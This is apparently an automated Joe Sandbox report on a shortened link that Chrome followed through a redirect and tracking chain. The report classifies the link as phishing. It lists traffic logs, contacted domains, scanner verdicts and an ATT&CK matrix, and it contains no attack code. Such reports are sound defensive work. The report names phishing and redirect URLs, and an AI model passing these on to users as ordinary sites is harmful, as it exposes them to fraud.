      Source: global trafficHTTP traffic detected: GET //scripts/sw/v9e118mez8 HTTP/1.1Host: trk-amropode.comConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tensewire.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /register/event_log/v9e118mez8 HTTP/1.1Host: event.trk-adulvion.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: chromecache_64.2.drString found in binary or memory: Math.round(p);v["gtm.videoCurrentTime"]=Math.round(q);v["gtm.videoElapsedTime"]=Math.round(f);v["gtm.videoPercent"]=r;v["gtm.videoVisible"]=t;return v},Qj:function(){e=zb()},sd:function(){d()}}};var dc=ka(["data-gtm-yt-inspected-"]),AC=["www.youtube.com","www.youtube-nocookie.com"],BC,CC=!1; equals www.youtube.com (Youtube)
      Source: chromecache_64.2.drString found in binary or memory: e||f||g.length||h.length))return;var n={Xg:d,Vg:e,Wg:f,Ih:g,Jh:h,ye:m,Ab:b},p=D.YT,q=function(){IC(n)};if(p)return p.ready&&p.ready(q),b;var r=D.onYouTubeIframeAPIReady;D.onYouTubeIframeAPIReady=function(){r&&r();q()};I(function(){for(var t=H.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(LC(w,"iframe_api")||LC(w,"player_api"))return b}for(var x=H.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!CC&&JC(x[A],n.ye))return tc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
      Source: chromecache_90.2.drString found in binary or memory: return b}yC.J="internal.enableAutoEventOnTimer";var dc=ka(["data-gtm-yt-inspected-"]),AC=["www.youtube.com","www.youtube-nocookie.com"],BC,CC=!1; equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: clc.li
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: marginmasks.com
      Source: global trafficDNS traffic detected: DNS query: tensewire.net
      Source: global trafficDNS traffic detected: DNS query: trk-adulvion.com
      Source: global trafficDNS traffic detected: DNS query: trk-amropode.com
      Source: global trafficDNS traffic detected: DNS query: event.trk-adulvion.com
      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: tensewire.netConnection: keep-aliveContent-Length: 41sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://tensewire.netSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
      Source: chromecache_64.2.drString found in binary or memory: https://adservice.google.com/pagead/regclk
      Source: chromecache_64.2.drString found in binary or memory: https://adservice.googlesyndication.com/pagead/regclk
      Source: chromecache_90.2.dr, chromecache_64.2.drString found in binary or memory: https://cct.google/taggy/agent.js
      Source: chromecache_94.2.dr, chromecache_66.2.drString found in binary or memory: https://getbootstrap.com/)
      Source: chromecache_94.2.dr, chromecache_66.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
      Source: chromecache_94.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
      Source: chromecache_64.2.drString found in binary or memory: https://pagead2.googlesyndication.com
      Source: chromecache_90.2.dr, chromecache_64.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
      Source: chromecache_64.2.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect
      Source: chromecache_64.2.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect?v=2&
      Source: chromecache_90.2.dr, chromecache_64.2.drString found in binary or memory: https://td.doubleclick.net
      Source: chromecache_70.2.drString found in binary or memory: https://tensewire.net/?s1=350359&s2=1174009843&s3=7090&s4=1&s10=4550
      Source: chromecache_80.2.drString found in binary or memory: https://trk-adulvion.com/scripts/push/v9e118mez8
      Source: chromecache_79.2.drString found in binary or memory: https://trk-amropode.com//scripts/pg/v9e118mez8
      Source: chromecache_79.2.drString found in binary or memory: https://trk-amropode.com//scripts/sw/v9e118mez8
      Source: chromecache_77.2.drString found in binary or memory: https://unisonroad.com
      Source: chromecache_64.2.drString found in binary or memory: https://www.google.com
      Source: chromecache_90.2.dr, chromecache_64.2.drString found in binary or memory: https://www.googleadservices.com
      Source: chromecache_90.2.dr, chromecache_64.2.drString found in binary or memory: https://www.googletagmanager.com
      Source: chromecache_64.2.drString found in binary or memory: https://www.merchant-center-analytics.goog
      Source: chromecache_64.2.drString found in binary or memory: https://www.youtube.com/iframe_api
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownHTTPS traffic detected: 184.24.36.112:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.24.36.112:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: classification engineClassification label: mal80.phis.win@18/56@18/8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2216,i,6873913864203263267,792881258309955960,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clc.li/bsLRU"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2216,i,6873913864203263267,792881258309955960,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      1
      Process Injection
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://clc.li/bsLRU0%Avira URL Cloudsafe
      https://clc.li/bsLRU1%VirustotalBrowse
      https://clc.li/bsLRU100%SlashNextFraudulent Website type: Phishing & Social Engineering
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      trk-adulvion.com4%VirustotalBrowse
      trk-amropode.com1%VirustotalBrowse
      fp2e7a.wpc.phicdn.net0%VirustotalBrowse
      event.trk-adulvion.com4%VirustotalBrowse
      tensewire.net4%VirustotalBrowse
      marginmasks.com1%VirustotalBrowse
      clc.li1%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://event.trk-adulvion.com/register/event_log/v9e118mez80%URL Reputationsafe
      https://trk-amropode.com//scripts/pg/v9e118mez80%URL Reputationsafe
      https://cct.google/taggy/agent.js0%URL Reputationsafe
      https://www.merchant-center-analytics.goog0%URL Reputationsafe
      https://trk-amropode.com//scripts/sw/v9e118mez80%URL Reputationsafe
      https://trk-adulvion.com/scripts/push/v9e118mez80%URL Reputationsafe
      https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343?_ax=w0%Avira URL Cloudsafe
      https://tensewire.net/assets/images/flags/flag-us.png0%Avira URL Cloudsafe
      https://tensewire.net/assets/js/gbvar.js?v=600%Avira URL Cloudsafe
      https://tensewire.net/assets/js/functions.js?v=454576b4f6c63244067eabf05b8f71b60%Avira URL Cloudsafe
      https://tensewire.net/assets/images/ci1.jpg0%Avira URL Cloudsafe
      https://tensewire.net/service-worker.js0%Avira URL Cloudsafe
      https://tensewire.net/assets/js/dublin/dist/common-hybrid.js?v=454576b4f6c63244067eabf05b8f71b60%Avira URL Cloudsafe
      https://tensewire.net/?s1=350359&s2=1174009843&s3=7090&s4=1&s10=45500%Avira URL Cloudsafe
      https://tensewire.net/assets/vendors/jquery-3.4.1.min.js0%Avira URL Cloudsafe
      https://marginmasks.com/0/0/0/d44549cb847e1e460ab518fbf82bb4e2/akdim0%Avira URL Cloudsafe
      https://tensewire.net/0%Avira URL Cloudsafe
      https://tensewire.net/assets/js/intl_functions.js?v=454576b4f6c63244067eabf05b8f71b60%Avira URL Cloudsafe
      https://tensewire.net/assets/images/ci21.jpg0%Avira URL Cloudsafe
      https://tensewire.net/inc/msg.v3.js?662a9f54742ee0%Avira URL Cloudsafe
      https://marginmasks.com/0/0/0/d44549cb847e1e460ab518fbf82bb4e2/akdim3%VirustotalBrowse
      https://tensewire.net/5%VirustotalBrowse
      https://tensewire.net/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js0%Avira URL Cloudsafe
      https://tensewire.net/assets/vendors/bootstrap-4.5.3/css/bootstrap.min.css0%Avira URL Cloudsafe
      https://tensewire.net/favicon.ico0%Avira URL Cloudsafe
      https://tensewire.net/uploads/archive/product/697/images/messmaster.png0%Avira URL Cloudsafe
      https://tensewire.net/assets/vendors/bootstrap-4.5.3/js/bootstrap.min.js0%Avira URL Cloudsafe
      https://tensewire.net/assets/css/dublin/dist/common-hybrid.css?v=454576b4f6c63244067eabf05b8f71b60%Avira URL Cloudsafe
      https://tensewire.net/uploads/archive/company/55/images/kohls-logo-purple.png0%Avira URL Cloudsafe
      https://unisonroad.com100%Avira URL Cloudphishing
      https://tensewire.net/assets/vendors/fontawesome_pro/webfonts/fa-solid-900.woff20%Avira URL Cloudsafe
      https://tensewire.net/assets/vendors/fontawesome_pro/css/all.min.css0%Avira URL Cloudsafe
      https://unisonroad.com10%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      tensewire.net
      104.21.47.80
      truefalseunknown
      trk-amropode.com
      104.21.22.140
      truefalseunknown
      www.google.com
      142.250.9.99
      truefalse
        high
        trk-adulvion.com
        104.21.80.104
        truefalseunknown
        event.trk-adulvion.com
        104.21.80.104
        truefalseunknown
        marginmasks.com
        31.24.251.250
        truefalseunknown
        clc.li
        172.67.128.112
        truefalseunknown
        fp2e7a.wpc.phicdn.net
        192.229.211.108
        truefalseunknown
        NameMaliciousAntivirus DetectionReputation
        https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343?_ax=wfalse
        • Avira URL Cloud: safe
        unknown
        https://tensewire.net/assets/images/flags/flag-us.pngfalse
        • Avira URL Cloud: safe
        unknown
        https://event.trk-adulvion.com/register/event_log/v9e118mez8false
        • URL Reputation: safe
        unknown
        https://tensewire.net/assets/js/gbvar.js?v=60false
        • Avira URL Cloud: safe
        unknown
        https://tensewire.net/assets/js/functions.js?v=454576b4f6c63244067eabf05b8f71b6false
        • Avira URL Cloud: safe
        unknown
        https://tensewire.net/assets/images/ci1.jpgfalse
        • Avira URL Cloud: safe
        unknown
        https://trk-amropode.com//scripts/pg/v9e118mez8false
        • URL Reputation: safe
        unknown
        https://tensewire.net/service-worker.jsfalse
        • Avira URL Cloud: safe
        unknown
        https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343false
          unknown
          https://clc.li/bsLRUtrue
            unknown
            https://tensewire.net/assets/js/dublin/dist/common-hybrid.js?v=454576b4f6c63244067eabf05b8f71b6false
            • Avira URL Cloud: safe
            unknown
            https://tensewire.net/?s1=350359&s2=1174009843&s3=7090&s4=1&s10=4550false
            • Avira URL Cloud: safe
            unknown
            https://tensewire.net/assets/vendors/jquery-3.4.1.min.jsfalse
            • Avira URL Cloud: safe
            unknown
            https://marginmasks.com/0/0/0/d44549cb847e1e460ab518fbf82bb4e2/akdimfalse
            • 3%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://tensewire.net/assets/js/intl_functions.js?v=454576b4f6c63244067eabf05b8f71b6false
            • Avira URL Cloud: safe
            unknown
            https://tensewire.net/false
            • 5%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://tensewire.net/assets/images/ci21.jpgfalse
            • Avira URL Cloud: safe
            unknown
            https://tensewire.net/inc/msg.v3.js?662a9f54742eefalse
            • Avira URL Cloud: safe
            unknown
            https://tensewire.net/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.jsfalse
            • Avira URL Cloud: safe
            unknown
            https://tensewire.net/assets/vendors/bootstrap-4.5.3/css/bootstrap.min.cssfalse
            • Avira URL Cloud: safe
            unknown
            https://tensewire.net/uploads/archive/product/697/images/messmaster.pngfalse
            • Avira URL Cloud: safe
            unknown
            https://tensewire.net/favicon.icofalse
            • Avira URL Cloud: safe
            unknown
            https://tensewire.net/assets/vendors/bootstrap-4.5.3/js/bootstrap.min.jsfalse
            • Avira URL Cloud: safe
            unknown
            https://tensewire.net/assets/css/dublin/dist/common-hybrid.css?v=454576b4f6c63244067eabf05b8f71b6false
            • Avira URL Cloud: safe
            unknown
            https://tensewire.net/assets/vendors/fontawesome_pro/css/all.min.cssfalse
            • Avira URL Cloud: safe
            unknown
            https://tensewire.net/uploads/archive/company/55/images/kohls-logo-purple.pngfalse
            • Avira URL Cloud: safe
            unknown
            https://trk-amropode.com//scripts/sw/v9e118mez8false
            • URL Reputation: safe
            unknown
            https://trk-adulvion.com/scripts/push/v9e118mez8false
            • URL Reputation: safe
            unknown
            https://tensewire.net/assets/vendors/fontawesome_pro/webfonts/fa-solid-900.woff2false
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://stats.g.doubleclick.net/g/collectchromecache_64.2.drfalse
              high
              https://github.com/twbs/bootstrap/blob/main/LICENSE)chromecache_94.2.dr, chromecache_66.2.drfalse
                high
                https://adservice.google.com/pagead/regclkchromecache_64.2.drfalse
                  high
                  https://getbootstrap.com/)chromecache_94.2.dr, chromecache_66.2.drfalse
                    high
                    https://cct.google/taggy/agent.jschromecache_90.2.dr, chromecache_64.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.google.comchromecache_64.2.drfalse
                      high
                      https://www.youtube.com/iframe_apichromecache_64.2.drfalse
                        high
                        https://github.com/twbs/bootstrap/graphs/contributors)chromecache_94.2.drfalse
                          high
                          https://td.doubleclick.netchromecache_90.2.dr, chromecache_64.2.drfalse
                            high
                            https://www.merchant-center-analytics.googchromecache_64.2.drfalse
                            • URL Reputation: safe
                            unknown
                            https://stats.g.doubleclick.net/g/collect?v=2&chromecache_64.2.drfalse
                              high
                              https://unisonroad.comchromecache_77.2.drfalse
                              • 10%, Virustotal, Browse
                              • Avira URL Cloud: phishing
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              31.24.251.250
                              marginmasks.comFrance
                              29608WAN2MANY-ASFRfalse
                              172.67.128.112
                              clc.liUnited States
                              13335CLOUDFLARENETUSfalse
                              239.255.255.250
                              unknownReserved
                              unknownunknownfalse
                              104.21.47.80
                              tensewire.netUnited States
                              13335CLOUDFLARENETUSfalse
                              142.250.9.99
                              www.google.comUnited States
                              15169GOOGLEUSfalse
                              104.21.80.104
                              trk-adulvion.comUnited States
                              13335CLOUDFLARENETUSfalse
                              104.21.22.140
                              trk-amropode.comUnited States
                              13335CLOUDFLARENETUSfalse
                              IP
                              192.168.2.4
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1431813
                              Start date and time:2024-04-25 20:21:11 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 24s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:browseurl.jbs
                              Sample URL:https://clc.li/bsLRU
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:9
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal80.phis.win@18/56@18/8
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 108.177.122.94, 74.125.136.138, 74.125.136.113, 74.125.136.101, 74.125.136.102, 74.125.136.139, 74.125.136.100, 142.251.15.84, 34.104.35.123, 74.125.136.97, 142.251.15.102, 142.251.15.101, 142.251.15.100, 142.251.15.139, 142.251.15.113, 142.251.15.138, 20.12.23.50, 23.47.204.79, 23.47.204.82, 23.47.204.44, 23.47.204.72, 23.47.204.75, 23.47.204.59, 23.47.204.68, 23.47.204.81, 23.47.204.64, 192.229.211.108, 20.166.126.56, 20.242.39.171, 64.233.185.94
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, www.googletagmanager.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, www.google-analytics.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtSetInformationFile calls found.
                              No simulations
                              No context
                              No context
                              No context
                              No context
                              No context
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3034)
                              Category:downloaded
                              Size (bytes):266777
                              Entropy (8bit):5.562631326424563
                              Encrypted:false
                              SSDEEP:6144:kSQX5NzgSYLceF+qKXjXP9RIMg7+5YDSf:kS+xgPNLEf
                              MD5:2208FB395C259BAEDBBF3F5014A45D67
                              SHA1:6A455660C4D2AFBFD2CC39AD1CA2AEDFD79E4480
                              SHA-256:F45B565D89689C0F97460174658164C9B35AC9CE0E72C4165B1CD01C083CFF71
                              SHA-512:3D0E830B6EE1302AE5751528AC9819822206C252437514EA8F4358B6CBE2C5668B599A1456147F68720A5083F91EBC9A987E3FBD6C3397B5A0807887490975B9
                              Malicious:false
                              Reputation:low
                              URL:https://www.googletagmanager.com/gtag/js?id=G-JMJ044GLKX&l=dataLayer&cx=c
